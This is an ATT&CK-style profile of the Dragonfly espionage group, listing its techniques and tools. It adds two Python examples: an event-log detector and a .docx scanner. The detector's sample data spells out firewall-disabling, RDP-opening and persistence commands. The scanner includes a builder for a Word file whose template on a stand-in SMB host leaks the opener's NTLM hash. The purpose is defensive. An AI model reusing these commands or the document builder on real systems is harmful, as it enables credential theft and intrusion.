
G0035 Dragonfly

Dragonfly is a cyber espionage group that has been attributed to Russia’s Federal Security Service (FSB) Center 16.[2][13] Active since at least 2010, Dragonfly has targeted defense and aviation companies, government entities, companies related to industrial control systems, and critical infrastructure sectors worldwide through supply chain, spearphishing, and drive-by compromise attacks.[11][7][10][4][9][1][12]

Item Value
ID G0035
Associated Names TEMP.Isotope, DYMALLOY, Berserk Bear, TG-4192, Crouching Yeti, IRON LIBERTY, Energetic Bear
Version 3.1
Created 31 May 2017
Last Modified 08 March 2023

Associated Group Descriptions

Name Description
TEMP.Isotope [5][9]
DYMALLOY [3][13]
Berserk Bear [9][2][13]
TG-4192 [7][13]
Crouching Yeti [7][9][2][13]
IRON LIBERTY [7][6][8][13]
Energetic Bear [11][7][6][8][9][2][13]

Techniques Used

Domain ID Name Use
enterprise T1087 Account Discovery -
enterprise T1087.002 Domain Account Dragonfly has used batch scripts to enumerate users on a victim domain controller.[14]
enterprise T1098 Account Manipulation Dragonfly has added newly created accounts to the administrators group to maintain elevated access.[14]
enterprise T1583 Acquire Infrastructure -
enterprise T1583.001 Domains Dragonfly has registered domains for targeting intended victims.[1]
enterprise T1583.003 Virtual Private Server Dragonfly has acquired VPS infrastructure for use in malicious campaigns.[9]
enterprise T1595 Active Scanning -
enterprise T1595.002 Vulnerability Scanning Dragonfly has scanned targeted systems for vulnerable Citrix and Microsoft Exchange services.[1]
enterprise T1071 Application Layer Protocol Dragonfly has used SMB for C2.[14]
enterprise T1560 Archive Collected Data Dragonfly has compressed data into .zip files prior to exfiltration.[14]
enterprise T1547 Boot or Logon Autostart Execution -
enterprise T1547.001 Registry Run Keys / Startup Folder Dragonfly has added the registry value ntdll to the Registry Run key to establish persistence.[14]
enterprise T1110 Brute Force Dragonfly has attempted to brute force credentials to gain access.[1]
enterprise T1110.002 Password Cracking Dragonfly has dropped and executed tools used for password cracking, including Hydra and CrackMapExec.[14][16]
enterprise T1059 Command and Scripting Interpreter Dragonfly has used the command line for execution.[14]
enterprise T1059.001 PowerShell Dragonfly has used PowerShell scripts for execution.[14][10]
enterprise T1059.003 Windows Command Shell Dragonfly has used various types of scripting to perform operations, including batch scripts.[14]
enterprise T1059.006 Python Dragonfly has used various types of scripting to perform operations, including Python scripts. The group was observed installing Python 2.7 on a victim.[14]
enterprise T1584 Compromise Infrastructure -
enterprise T1584.004 Server Dragonfly has compromised legitimate websites to host C2 and malware modules.[9]
enterprise T1136 Create Account -
enterprise T1136.001 Local Account Dragonfly has created accounts on victims, including administrator accounts, some of which appeared to be tailored to each individual staging target.[14]
enterprise T1005 Data from Local System Dragonfly has collected data from local victim systems.[14]
enterprise T1074 Data Staged -
enterprise T1074.001 Local Data Staging Dragonfly has created a directory named “out” in the user’s %AppData% folder and copied files to it.[14]
enterprise T1189 Drive-by Compromise Dragonfly has compromised targets via strategic web compromise (SWC) utilizing a custom exploit kit.[7][14][9]
enterprise T1114 Email Collection -
enterprise T1114.002 Remote Email Collection Dragonfly has accessed email accounts using Outlook Web Access.[14]
enterprise T1190 Exploit Public-Facing Application Dragonfly has conducted SQL injection attacks, exploited vulnerabilities CVE-2019-19781 and CVE-2020-0688 for Citrix and MS Exchange, and CVE-2018-13379 for Fortinet VPNs.[1]
enterprise T1203 Exploitation for Client Execution Dragonfly has exploited CVE-2011-0611 in Adobe Flash Player to gain execution on a targeted system.[9]
enterprise T1210 Exploitation of Remote Services Dragonfly has exploited a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory servers.[1]
enterprise T1133 External Remote Services Dragonfly has used VPNs and Outlook Web Access (OWA) to maintain access to victim networks.[14][1]
enterprise T1083 File and Directory Discovery Dragonfly has used a batch script to gather folder and file names from victim hosts.[14][9][1]
enterprise T1187 Forced Authentication Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems.[14][9]
enterprise T1591 Gather Victim Org Information -
enterprise T1591.002 Business Relationships Dragonfly has collected open source information to identify relationships between organizations for targeting purposes.[9]
enterprise T1564 Hide Artifacts -
enterprise T1564.002 Hidden Users Dragonfly has modified the Registry to hide created user accounts.[14]
enterprise T1562 Impair Defenses -
enterprise T1562.004 Disable or Modify System Firewall Dragonfly has disabled host-based firewalls. The group has also globally opened port 3389.[14]
enterprise T1070 Indicator Removal -
enterprise T1070.001 Clear Windows Event Logs Dragonfly has cleared Windows event logs and other logs produced by tools they used, including system, security, terminal services, remote services, and audit logs. The actors also deleted specific Registry keys.[14]
enterprise T1070.004 File Deletion Dragonfly has deleted many of its files used during operations as part of cleanup, including removing applications and deleting screenshots.[14]
enterprise T1105 Ingress Tool Transfer Dragonfly has copied and installed tools for operations once in the victim environment.[14]
enterprise T1036 Masquerading Dragonfly has created accounts disguised as legitimate backup and service accounts as well as an email administration account.[14]
enterprise T1112 Modify Registry Dragonfly has modified the Registry to perform multiple techniques through the use of Reg.[14]
enterprise T1135 Network Share Discovery Dragonfly has identified and browsed file servers in the victim network, sometimes viewing files pertaining to ICS or Supervisory Control and Data Acquisition (SCADA) systems.[14]
enterprise T1588 Obtain Capabilities -
enterprise T1588.002 Tool Dragonfly has obtained and used tools such as Mimikatz, CrackMapExec, and PsExec.[7]
enterprise T1003 OS Credential Dumping -
enterprise T1003.002 Security Account Manager Dragonfly has dropped and executed SecretsDump to dump password hashes.[14]
enterprise T1003.003 NTDS Dragonfly has dropped and executed SecretsDump to dump password hashes. They also obtained ntds.dit from domain controllers.[14][15]
enterprise T1003.004 LSA Secrets Dragonfly has dropped and executed SecretsDump to dump password hashes.[14][15]
enterprise T1069 Permission Groups Discovery -
enterprise T1069.002 Domain Groups Dragonfly has used batch scripts to enumerate administrators and users in the domain.[14]
enterprise T1566 Phishing -
enterprise T1566.001 Spearphishing Attachment Dragonfly has sent emails with malicious attachments to gain initial access.[9]
enterprise T1598 Phishing for Information -
enterprise T1598.002 Spearphishing Attachment Dragonfly has used spearphishing with Microsoft Office attachments to enable harvesting of user credentials.[14]
enterprise T1598.003 Spearphishing Link Dragonfly has used spearphishing with PDF attachments containing malicious links that redirected to credential harvesting websites.[14]
enterprise T1012 Query Registry Dragonfly has queried the Registry to identify victim information.[14]
enterprise T1021 Remote Services -
enterprise T1021.001 Remote Desktop Protocol Dragonfly has moved laterally via RDP.[14]
enterprise T1018 Remote System Discovery Dragonfly has likely obtained a list of hosts in the victim environment.[14]
enterprise T1053 Scheduled Task/Job -
enterprise T1053.005 Scheduled Task Dragonfly has used scheduled tasks to automatically log out of created accounts every 8 hours as well as to execute malicious files.[14]
enterprise T1113 Screen Capture Dragonfly has performed screen captures of victims, including by using a tool, scr.exe (which matched the hash of ScreenUtil).[14][10][9]
enterprise T1505 Server Software Component -
enterprise T1505.003 Web Shell Dragonfly has commonly created Web shells on victims’ publicly accessible email and web servers, which they used to maintain access to a victim network and download additional malicious files.[14]
enterprise T1608 Stage Capabilities -
enterprise T1608.004 Drive-by Target Dragonfly has compromised websites to redirect traffic and to host exploit kits.[9]
enterprise T1195 Supply Chain Compromise -
enterprise T1195.002 Compromise Software Supply Chain Dragonfly has placed trojanized installers for control system software on legitimate vendor app stores.[7][9]
enterprise T1016 System Network Configuration Discovery Dragonfly has used batch scripts to enumerate network information, including information about trusts, zones, and the domain.[14]
enterprise T1033 System Owner/User Discovery Dragonfly has used the command "query user" on victim hosts.[14]
enterprise T1221 Template Injection Dragonfly has injected SMB URLs into malicious Word spearphishing attachments to initiate Forced Authentication.[14]
enterprise T1204 User Execution -
enterprise T1204.002 Malicious File Dragonfly has used various forms of spearphishing in attempts to get users to open malicious attachments.[9]
enterprise T1078 Valid Accounts Dragonfly has compromised user credentials and used valid accounts for operations.[14][9][1]
ics T0817 Drive-by Compromise Dragonfly utilized watering hole attacks on energy sector websites by injecting a redirect iframe to deliver Backdoor.Oldrea or Trojan.Karagany.[17]
ics T0862 Supply Chain Compromise Dragonfly trojanized legitimate ICS equipment providers’ software packages available for download on their websites.[17]
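
Several rows above (T1547.001 Run key value "ntdll", T1564.002 hidden users, T1098/T1136.001 new accounts added to Administrators, T1562.004 firewall disabled and port 3389 opened, T1053.005 an 8-hourly logoff task) describe host artifacts that are cheap to detect once logged. The following is an added example, not code from the ATT&CK page or from the TA18-074A alert: a small Python detector run over constructed Windows Security and Sysmon event records. The event IDs, field names and registry paths are the standard Windows ones; the account name backup_svc, the SID, the command lines and the task XML are made up for the demo, and the logoff-task check assumes the 8-hour cadence appears as a PT8H repetition interval in the task XML.

```python
"""Flag Dragonfly-style host artifacts in Windows Security and Sysmon events.

Added example; not code from the ATT&CK page or TA18-074A. Event IDs, field
names and registry paths are the standard Windows ones. Every record in
SAMPLE_EVENTS is constructed for this demo.
"""
import re

# Sysmon event 13 (registry value set): a Run-key value literally named "ntdll".
RUN_KEY_NTDLL_RE = re.compile(r"\\CurrentVersion\\Run\\ntdll$", re.IGNORECASE)
# Winlogon\SpecialAccounts\UserList\<user> = 0 hides <user> from the logon screen.
USERLIST_RE = re.compile(r"\\Winlogon\\SpecialAccounts\\UserList\\([^\\]+)$", re.IGNORECASE)
# netsh turning a firewall profile off entirely.
FIREWALL_OFF_RE = re.compile(r"netsh\s+advfirewall\s+set\s+\w+\s+state\s+off", re.IGNORECASE)
# <Command>/<Arguments> inside the TaskContent XML of Security event 4698.
TASK_CMD_RE = re.compile(r"<Command>([^<]*)</Command>(?:\s*<Arguments>([^<]*)</Arguments>)?", re.IGNORECASE)


def is_periodic_logoff(task_xml):
    """True if the task logs users off on an 8-hour repetition (assumed PT8H form)."""
    m = TASK_CMD_RE.search(task_xml)
    if not m or "<Interval>PT8H</Interval>" not in task_xml:
        return False
    cmd, args = (m.group(1) or "").lower(), (m.group(2) or "").lower()
    return "logoff" in cmd or ("shutdown" in cmd and "/l" in args.split())


def detect(events):
    """Return sorted (rule, detail) hits. Account creation (4720) is correlated
    with Administrators-group additions (4732) by SID within the same batch."""
    hits, created = [], {}  # created: SID -> account name seen in event 4720
    for ev in events:
        src, eid = ev["Source"], ev["EventID"]
        if src == "Sysmon" and eid == 13:
            target = ev["TargetObject"]
            if RUN_KEY_NTDLL_RE.search(target):
                hits.append(("run_key_ntdll", ev["Details"]))
            m = USERLIST_RE.search(target)
            if m and ev["Details"].endswith("(0x00000000)"):
                hits.append(("hidden_user", m.group(1)))
        elif src == "Sysmon" and eid == 1:
            cmd = ev["CommandLine"]
            low = cmd.lower()
            if "advfirewall" in low and "3389" in low and "action=allow" in low:
                hits.append(("rdp_opened", cmd))
            if FIREWALL_OFF_RE.search(low):
                hits.append(("firewall_disabled", cmd))
        elif src == "Security" and eid == 4720:
            created[ev["TargetSid"]] = ev["TargetUserName"]
        elif src == "Security" and eid == 4732:
            if ev["TargetUserName"].lower() == "administrators" and ev["MemberSid"] in created:
                hits.append(("new_user_made_admin", created[ev["MemberSid"]]))
        elif src == "Security" and eid == 4698:
            if is_periodic_logoff(ev["TaskContent"]):
                hits.append(("periodic_logoff_task", ev["TaskName"]))
    return sorted(hits)


# Constructed sample telemetry (not real logs); the last record is benign noise.
SAMPLE_EVENTS = [
    {"Source": "Security", "EventID": 4720, "TargetUserName": "backup_svc",
     "TargetSid": "S-1-5-21-1111-2222-3333-1005"},
    {"Source": "Security", "EventID": 4732, "TargetUserName": "Administrators",
     "MemberSid": "S-1-5-21-1111-2222-3333-1005"},
    {"Source": "Sysmon", "EventID": 13, "Details": "DWORD (0x00000000)",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList\backup_svc"},
    {"Source": "Sysmon", "EventID": 13, "Details": r"C:\Users\Public\ntdll.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ntdll"},
    {"Source": "Sysmon", "EventID": 1,
     "CommandLine": 'netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow'},
    {"Source": "Sysmon", "EventID": 1, "CommandLine": "netsh advfirewall set allprofiles state off"},
    {"Source": "Security", "EventID": 4698, "TaskName": r"\logoff",
     "TaskContent": "<Task><Triggers><TimeTrigger><Repetition><Interval>PT8H</Interval></Repetition>"
                    "</TimeTrigger></Triggers><Actions><Exec><Command>shutdown.exe</Command>"
                    "<Arguments>/l</Arguments></Exec></Actions></Task>"},
    {"Source": "Sysmon", "EventID": 13, "Details": r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
     "TargetObject": r"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive"},
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:22s} {detail}")
```

Each rule is deliberately narrow (a specific value name, a specific registry path, a specific netsh form) so that it fires on the reported tradecraft with little noise; in production the 4720/4732 correlation should also key on a time window rather than a single batch.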

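The T1221 and T1187 rows above describe the Word template-injection trick: the document's settings part attaches an external template whose target is an SMB/UNC path, so Word tries to authenticate to the attacker's host the moment the file is opened, leaking the user's NTLM hash. This added example (not from the ATT&CK page or any of its sources) builds a minimal .docx in memory with such a relationship and scans it. The OOXML part names, the attachedTemplate relationship type and the XML namespaces are the real ones; the 192.0.2.10 host, share name and file names are constructed for the demo.

```python
"""Scan a .docx for external relationships that point at SMB/UNC paths.

Added example; not code from the ATT&CK page or its sources. OOXML part
names, the attachedTemplate relationship type and namespaces are the real
ones; the sample document and its 192.0.2.10 target are constructed.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
ATTACHED_TEMPLATE = R_NS + "/attachedTemplate"
# file: URLs and \\host or //host paths all make Word open an SMB session (NTLM auth).
UNC_RE = re.compile(r"^(?:file:|\\\\|//)", re.IGNORECASE)


def classify_target(rel_type, target):
    """Verdict for one external relationship target, or None if nothing to flag."""
    if UNC_RE.match(target):
        return "smb_forced_auth"
    if rel_type == ATTACHED_TEMPLATE and target.lower().startswith(("http://", "https://")):
        return "remote_template"  # fetched at open time; the server can redirect to a UNC path
    return None


def scan_docx(data):
    """Return (part, relationship type, target, verdict) for every flagged relationship."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter("{%s}Relationship" % REL_NS):
                if rel.get("TargetMode") != "External":
                    continue  # internal parts cannot trigger a network fetch
                rel_type, target = rel.get("Type", ""), rel.get("Target", "")
                verdict = classify_target(rel_type, target)
                if verdict:
                    findings.append((name, rel_type.rsplit("/", 1)[-1], target, verdict))
    return findings


def build_docx(template_target=None):
    """Construct a minimal .docx; with template_target, settings.xml attaches that external template."""
    doc = ('<w:document xmlns:w="%s"><w:body><w:p><w:r><w:t>Invoice attached.</w:t>'
           '</w:r></w:p></w:body></w:document>' % W_NS)
    settings = '<w:settings xmlns:w="%s" xmlns:r="%s">%s</w:settings>' % (
        W_NS, R_NS, '<w:attachedTemplate r:id="rId1"/>' if template_target else "")
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("word/document.xml", doc)
        zf.writestr("word/settings.xml", settings)
        if template_target:
            zf.writestr("word/_rels/settings.xml.rels",
                        '<Relationships xmlns="%s"><Relationship Id="rId1" Type="%s" '
                        'Target="%s" TargetMode="External"/></Relationships>'
                        % (REL_NS, ATTACHED_TEMPLATE, template_target))
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed malicious sample: template on an attacker-controlled SMB share.
    for finding in scan_docx(build_docx(r"\\192.0.2.10\share\invoice.dotm")):
        print(finding)
```

Because every .rels part is checked, the same scan also catches UNC targets in hyperlink, image or OLE relationships, not only the attachedTemplate case the table names; egress filtering of TCP 445 and NTLM outbound restrictions remain the structural fix for the forced-authentication half of the technique.
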
Software

ID Name References Techniques
S0093 Backdoor.Oldrea [11][9] Email Account: Account Discovery, Archive Collected Data, Automated Collection, Registry Run Keys / Startup Folder: Boot or Logon Autostart Execution, Credentials from Web Browsers: Credentials from Password Stores, Standard Encoding: Data Encoding, Denial of Service, File and Directory Discovery, File Deletion: Indicator Removal, Ingress Tool Transfer, Network Service Discovery, Point & Tag Identification, Process Discovery, Process Injection, Remote System Discovery, Remote System Discovery, Remote System Information Discovery, Spearphishing Attachment, Supply Chain Compromise, Rundll32: System Binary Proxy Execution, System Information Discovery, System Network Configuration Discovery, System Owner/User Discovery, User Execution
S0488 CrackMapExec [7][14] Domain Account: Account Discovery, Brute Force, Password Guessing: Brute Force, Password Spraying: Brute Force, PowerShell: Command and Scripting Interpreter, File and Directory Discovery, Modify Registry, Network Share Discovery, LSA Secrets: OS Credential Dumping, NTDS: OS Credential Dumping, Security Account Manager: OS Credential Dumping, Password Policy Discovery, Domain Groups: Permission Groups Discovery, Remote System Discovery, At: Scheduled Task/Job, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, Pass the Hash: Use Alternate Authentication Material, Windows Management Instrumentation
S0357 Impacket [14][15] LLMNR/NBT-NS Poisoning and SMB Relay: Adversary-in-the-Middle, Network Sniffing, NTDS: OS Credential Dumping, Security Account Manager: OS Credential Dumping, LSA Secrets: OS Credential Dumping, LSASS Memory: OS Credential Dumping, Kerberoasting: Steal or Forge Kerberos Tickets, Service Execution: System Services, Windows Management Instrumentation
S0500 MCMD [6] Web Protocols: Application Layer Protocol, Registry Run Keys / Startup Folder: Boot or Logon Autostart Execution, Windows Command Shell: Command and Scripting Interpreter, Data from Local System, Hidden Window: Hide Artifacts, Clear Persistence: Indicator Removal, Ingress Tool Transfer, Match Legitimate Name or Location: Masquerading, Obfuscated Files or Information, Scheduled Task: Scheduled Task/Job
S0002 Mimikatz [7] SID-History Injection: Access Token Manipulation, Account Manipulation, Security Support Provider: Boot or Logon Autostart Execution, Credentials from Password Stores, Windows Credential Manager: Credentials from Password Stores, Credentials from Web Browsers: Credentials from Password Stores, LSASS Memory: OS Credential Dumping, DCSync: OS Credential Dumping, Security Account Manager: OS Credential Dumping, LSA Secrets: OS Credential Dumping, Rogue Domain Controller, Steal or Forge Authentication Certificates, Silver Ticket: Steal or Forge Kerberos Tickets, Golden Ticket: Steal or Forge Kerberos Tickets, Private Keys: Unsecured Credentials, Pass the Ticket: Use Alternate Authentication Material, Pass the Hash: Use Alternate Authentication Material
S0039 Net [14] Domain Account: Account Discovery, Local Account: Account Discovery, Local Account: Create Account, Domain Account: Create Account, Network Share Connection Removal: Indicator Removal, Network Share Discovery, Password Policy Discovery, Local Groups: Permission Groups Discovery, Domain Groups: Permission Groups Discovery, SMB/Windows Admin Shares: Remote Services, Remote System Discovery, System Network Connections Discovery, System Service Discovery, Service Execution: System Services, System Time Discovery
S0108 netsh [14] Netsh Helper DLL: Event Triggered Execution, Disable or Modify System Firewall: Impair Defenses, Proxy, Security Software Discovery: Software Discovery
S0029 PsExec [7][14][10][9] Domain Account: Create Account, Windows Service: Create or Modify System Process, Lateral Tool Transfer, SMB/Windows Admin Shares: Remote Services, Service Execution: System Services
S0075 Reg [14] Modify Registry, Query Registry, Credentials in Registry: Unsecured Credentials
S0094 Trojan.Karagany [11][8][9] Web Protocols: Application Layer Protocol, Application Window Discovery, Registry Run Keys / Startup Folder: Boot or Logon Autostart Execution, Windows Command Shell: Command and Scripting Interpreter, Credentials from Web Browsers: Credentials from Password Stores, Local Data Staging: Data Staged, Asymmetric Cryptography: Encrypted Channel, File and Directory Discovery, File Deletion: Indicator Removal, Ingress Tool Transfer, Keylogging: Input Capture, Software Packing: Obfuscated Files or Information, Obfuscated Files or Information, OS Credential Dumping, Process Discovery, Thread Execution Hijacking: Process Injection, Screen Capture, System Information Discovery, System Network Configuration Discovery, System Network Connections Discovery, System Owner/User Discovery, System Checks: Virtualization/Sandbox Evasion

References

  1. CISA. (2020, December 1). Russian State-Sponsored Advanced Persistent Threat Actor Compromises U.S. Government Targets. Retrieved December 9, 2021.
  2. Department of Justice. (2022, March 24). Four Russian Government Employees Charged in Two Historical Hacking Campaigns Targeting Critical Infrastructure Worldwide. Retrieved April 5, 2022.
  3. Dragos. (n.d.). DYMALLOY. Retrieved August 20, 2020.
  4. Hackett, R. (2017, September 6). Hackers Have Penetrated Energy Grid, Symantec Warns. Retrieved June 6, 2018.
  5. Hultquist, J. (2022, January 20). Anticipating Cyber Threats as the Ukraine Crisis Escalates. Retrieved January 24, 2022.
  6. Secureworks. (2019, July 24). MCMD Malware Analysis. Retrieved August 13, 2020.
  7. Secureworks. (2019, July 24). Resurgent Iron Liberty Targeting Energy Sector. Retrieved August 12, 2020.
  8. Secureworks. (2019, July 24). Updated Karagany Malware Targets Energy Sector. Retrieved August 12, 2020.
  9. Slowik, J. (2021, October). The Baffling Berserk Bear: A Decade’s Activity Targeting Critical Infrastructure. Retrieved December 6, 2021.
  10. Symantec Security Response. (2014, July 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved September 9, 2017.
  11. Symantec Security Response. (2014, June 30). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.
  12. Symantec. (2017, October 7). Dragonfly: Western energy sector targeted by sophisticated attack group. Retrieved April 19, 2022.
  13. UK Gov. (2022, April 5). Russia’s FSB malign activity: factsheet. Retrieved April 5, 2022.
  14. US-CERT. (2018, March 16). Alert (TA18-074A): Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors. Retrieved June 6, 2018.
  15. Core Security. (n.d.). Impacket. Retrieved November 2, 2017.
  16. Kali. (2014, February 18). THC-Hydra. Retrieved November 2, 2017.
  17. Symantec Security Response. (2014, July 7). Dragonfly: Cyberespionage Attacks Against Energy Suppliers. Retrieved April 8, 2016.